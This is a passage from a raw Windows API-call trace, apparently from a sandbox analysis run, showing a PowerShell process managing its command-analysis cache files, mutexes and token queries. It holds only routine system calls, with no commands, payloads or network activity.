lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0229.636] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8b410, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0229.636] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b860) returned 1 [0229.636] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8b940 | out: lpFileInformation=0x653ef8b940*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0229.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b820) returned 1 [0229.637] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8b2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0229.637] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8b7a0) returned 1 [0229.637] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x824 [0229.637] GetFileType (hFile=0x824) returned 0x1 [0229.637] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8b710) returned 1 [0229.637] GetFileType (hFile=0x824) returned 0x1 [0229.637] SetEndOfFile (hFile=0x824) returned 1 [0229.639] WriteFile (in: hFile=0x824, lpBuffer=0x25b5c14eed0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8afe8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c14eed0*, lpNumberOfBytesWritten=0x653ef8afe8*=0x1000, lpOverlapped=0x0) returned 1 [0229.641] WriteFile (in: hFile=0x824, lpBuffer=0x25b5c14eed0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8b1b8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c14eed0*, lpNumberOfBytesWritten=0x653ef8b1b8*=0x1000, lpOverlapped=0x0) returned 1 [0229.641] WriteFile (in: hFile=0x824, lpBuffer=0x25b5c14eed0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8b168, lpOverlapped=0x0 | out: lpBuffer=0x25b5c14eed0*, lpNumberOfBytesWritten=0x653ef8b168*=0x1000, lpOverlapped=0x0) returned 1 [0229.642] WriteFile (in: hFile=0x824, lpBuffer=0x25b5c14eed0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8afe8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c14eed0*, lpNumberOfBytesWritten=0x653ef8afe8*=0x1000, lpOverlapped=0x0) returned 1 [0229.643] WriteFile (in: hFile=0x824, lpBuffer=0x25b5c14eed0*, nNumberOfBytesToWrite=0xced, lpNumberOfBytesWritten=0x653ef8b8a8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c14eed0*, lpNumberOfBytesWritten=0x653ef8b8a8*=0xced, lpOverlapped=0x0) returned 1 [0229.643] CloseHandle (hObject=0x824) returned 1 [0229.647] ReleaseMutex (hMutex=0x820) returned 1 [0229.660] CoTaskMemAlloc (cb=0x20c) returned 0x25b73d01ce0 [0229.660] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73d01ce0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0229.660] CoTaskMemFree (pv=0x25b73d01ce0) [0229.660] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8cf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0229.660] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfc5c0 [0229.660] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfc5c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0229.660] CoTaskMemFree (pv=0x25b73cfc5c0) [0229.660] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cffae0 [0229.660] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cffae0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0229.661] CoTaskMemFree (pv=0x25b73cffae0) [0229.661] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0229.661] GetCurrentProcess () returned 0xffffffffffffffff [0229.661] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d378 | out: TokenHandle=0x653ef8d378*=0x824) returned 1 [0229.661] GetTokenInformation (in: TokenHandle=0x824, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d478 | out: TokenInformation=0x0, ReturnLength=0x653ef8d478) returned 0 [0229.661] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739d20d0 [0229.661] GetTokenInformation (in: TokenHandle=0x824, TokenInformationClass=0x1, TokenInformation=0x25b739d20d0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d478 | out: TokenInformation=0x25b739d20d0, ReturnLength=0x653ef8d478) returned 1 [0229.662] LocalFree (hMem=0x25b739d20d0) returned 0x0 [0229.662] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c154fc0, cbSid=0x653ef8d470 | out: pSid=0x25b5c154fc0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d470) returned 1 [0229.663] CreateMutexW (lpMutexAttributes=0x25b5c155110, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x6f4 [0229.663] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d310*=0x6f4, lpdwindex=0x653ef8d0e4 | out: lpdwindex=0x653ef8d0e4) returned 0x0 [0229.663] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0229.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d290) returned 1 [0229.663] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d370 | out: lpFileInformation=0x653ef8d370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0229.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d250) returned 1 [0229.664] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0229.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d1d0) returned 1 [0229.664] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x814 [0229.664] GetFileType (hFile=0x814) returned 0x1 [0229.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d140) returned 1 [0229.664] GetFileType (hFile=0x814) returned 0x1 [0229.664] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c1561d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d038, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1561d8*, lpNumberOfBytesRead=0x653ef8d038*=0x1000, lpOverlapped=0x0) returned 1 [0229.669] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c157fba, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8ccd8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c157fba*, lpNumberOfBytesRead=0x653ef8ccd8*=0x1f, lpOverlapped=0x0) returned 1 [0229.670] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c1561d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cca8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1561d8*, lpNumberOfBytesRead=0x653ef8cca8*=0x1000, lpOverlapped=0x0) returned 1 [0229.671] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c157fbc, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8cb58, lpOverlapped=0x0 | out: lpBuffer=0x25b5c157fbc*, lpNumberOfBytesRead=0x653ef8cb58*=0x27, lpOverlapped=0x0) returned 1 [0229.671] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c1561d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cbf8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1561d8*, lpNumberOfBytesRead=0x653ef8cbf8*=0x1000, lpOverlapped=0x0) returned 1 [0229.672] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c157f88, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8cab8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c157f88*, lpNumberOfBytesRead=0x653ef8cab8*=0x5, lpOverlapped=0x0) returned 1 [0229.672] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c1561d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cb58, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1561d8*, lpNumberOfBytesRead=0x653ef8cb58*=0x1000, lpOverlapped=0x0) returned 1 [0229.672] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c157f5a, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8cc68, lpOverlapped=0x0 | out: lpBuffer=0x25b5c157f5a*, lpNumberOfBytesRead=0x653ef8cc68*=0x1d, lpOverlapped=0x0) returned 1 [0229.672] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c1561d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cd08, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1561d8*, lpNumberOfBytesRead=0x653ef8cd08*=0xc85, lpOverlapped=0x0) returned 1 [0229.672] ReadFile (in: hFile=0x814, lpBuffer=0x25b5c1561d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d008, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1561d8*, lpNumberOfBytesRead=0x653ef8d008*=0x0, lpOverlapped=0x0) returned 1 [0229.672] CloseHandle (hObject=0x814) returned 1 [0229.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0229.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d460) returned 1 [0229.673] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c163070 | out: lpFileInformation=0x25b5c163070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0229.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d420) returned 1 [0229.673] ReleaseMutex (hMutex=0x6f4) returned 1 [0229.673] GetCurrentProcess () returned 0xffffffffffffffff [0229.673] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d4a8 | out: TokenHandle=0x653ef8d4a8*=0x814) returned 1 [0229.674] GetTokenInformation (in: TokenHandle=0x814, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d5a8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d5a8) returned 0 [0229.674] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739d21d0 [0229.674] GetTokenInformation (in: TokenHandle=0x814, TokenInformationClass=0x1, TokenInformation=0x25b739d21d0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d5a8 | out: TokenInformation=0x25b739d21d0, ReturnLength=0x653ef8d5a8) returned 1 [0229.675] LocalFree (hMem=0x25b739d21d0) returned 0x0 [0229.675] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c163cf8, cbSid=0x653ef8d5a0 | out: pSid=0x25b5c163cf8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d5a0) returned 1 [0229.676] CreateMutexW (lpMutexAttributes=0x25b5c163e48, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x828 [0229.676] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d440*=0x828, lpdwindex=0x653ef8d214 | out: lpdwindex=0x653ef8d214) returned 0x0 [0229.677] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe9e0 [0229.677] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe9e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0229.677] CoTaskMemFree (pv=0x25b73cfe9e0) [0229.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d040, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0229.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0229.677] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c1927a8 | out: lpFileInformation=0x25b5c1927a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0229.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d490) returned 1 [0229.678] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0229.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d350) returned 1 [0229.678] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d430 | out: lpFileInformation=0x653ef8d430*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0229.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d310) returned 1 [0229.678] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x653ef8cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6e [0229.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d290) returned 1 [0229.679] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x82c [0229.679] GetFileType (hFile=0x82c) returned 0x1 [0229.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d200) returned 1 [0229.679] GetFileType (hFile=0x82c) returned 0x1 [0229.679] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c193de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d0f8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c193de0*, lpNumberOfBytesRead=0x653ef8d0f8*=0x1000, lpOverlapped=0x0) returned 1 [0229.679] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c195bc2, nNumberOfBytesToRead=0x1f, lpNumberOfBytesRead=0x653ef8cd98, lpOverlapped=0x0 | out: lpBuffer=0x25b5c195bc2*, lpNumberOfBytesRead=0x653ef8cd98*=0x1f, lpOverlapped=0x0) returned 1 [0229.679] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c193de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cd68, lpOverlapped=0x0 | out: lpBuffer=0x25b5c193de0*, lpNumberOfBytesRead=0x653ef8cd68*=0x1000, lpOverlapped=0x0) returned 1 [0229.679] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c195bc4, nNumberOfBytesToRead=0x27, lpNumberOfBytesRead=0x653ef8cc18, lpOverlapped=0x0 | out: lpBuffer=0x25b5c195bc4*, lpNumberOfBytesRead=0x653ef8cc18*=0x27, lpOverlapped=0x0) returned 1 [0229.680] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c193de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8ccb8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c193de0*, lpNumberOfBytesRead=0x653ef8ccb8*=0x1000, lpOverlapped=0x0) returned 1 [0229.680] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c195b90, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x653ef8cb78, lpOverlapped=0x0 | out: lpBuffer=0x25b5c195b90*, lpNumberOfBytesRead=0x653ef8cb78*=0x5, lpOverlapped=0x0) returned 1 [0229.680] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c193de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cc18, lpOverlapped=0x0 | out: lpBuffer=0x25b5c193de0*, lpNumberOfBytesRead=0x653ef8cc18*=0x1000, lpOverlapped=0x0) returned 1 [0229.680] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c195b62, nNumberOfBytesToRead=0x1d, lpNumberOfBytesRead=0x653ef8cd28, lpOverlapped=0x0 | out: lpBuffer=0x25b5c195b62*, lpNumberOfBytesRead=0x653ef8cd28*=0x1d, lpOverlapped=0x0) returned 1 [0229.680] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c193de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8cdc8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c193de0*, lpNumberOfBytesRead=0x653ef8cdc8*=0xc85, lpOverlapped=0x0) returned 1 [0229.681] ReadFile (in: hFile=0x82c, lpBuffer=0x25b5c193de0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d0c8, lpOverlapped=0x0 | out: lpBuffer=0x25b5c193de0*, lpNumberOfBytesRead=0x653ef8d0c8*=0x0, lpOverlapped=0x0) returned 1 [0229.681] CloseHandle (hObject=0x82c) returned 1 [0229.681] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfe380 [0229.681] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfe380 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0229.681] CoTaskMemFree (pv=0x25b73cfe380) [0229.681] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0229.681] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0229.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d3d0) returned 1 [0229.681] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d4b0 | out: lpFileInformation=0x653ef8d4b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0229.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d390) returned 1 [0229.682] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", nBufferLength=0x105, lpBuffer=0x653ef8ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", lpFilePart=0x0) returned 0x93 [0229.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d310) returned 1 [0229.682] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da21122d-ae44-4f93-ba1d-c9a978ca5b20"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x82c [0229.682] GetFileType (hFile=0x82c) returned 0x1 [0229.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d280) returned 1 [0229.682] GetFileType (hFile=0x82c) returned 0x1 [0229.682] SetEndOfFile (hFile=0x82c) returned 1 [0229.683] WriteFile (in: hFile=0x82c, lpBuffer=0x25b5c1a2210*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8cd08, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1a2210*, lpNumberOfBytesWritten=0x653ef8cd08*=0x1000, lpOverlapped=0x0) returned 1 [0229.685] WriteFile (in: hFile=0x82c, lpBuffer=0x25b5c1a2210*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x653ef8cd08, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1a2210*, lpNumberOfBytesWritten=0x653ef8cd08*=0x1000, lpOverlapped=0x0) returned 1 [0229.685] WriteFile (in: hFile=0x82c, lpBuffer=0x25b5c1a2210*, nNumberOfBytesToWrite=0xb07, lpNumberOfBytesWritten=0x653ef8d418, lpOverlapped=0x0 | out: lpBuffer=0x25b5c1a2210*, 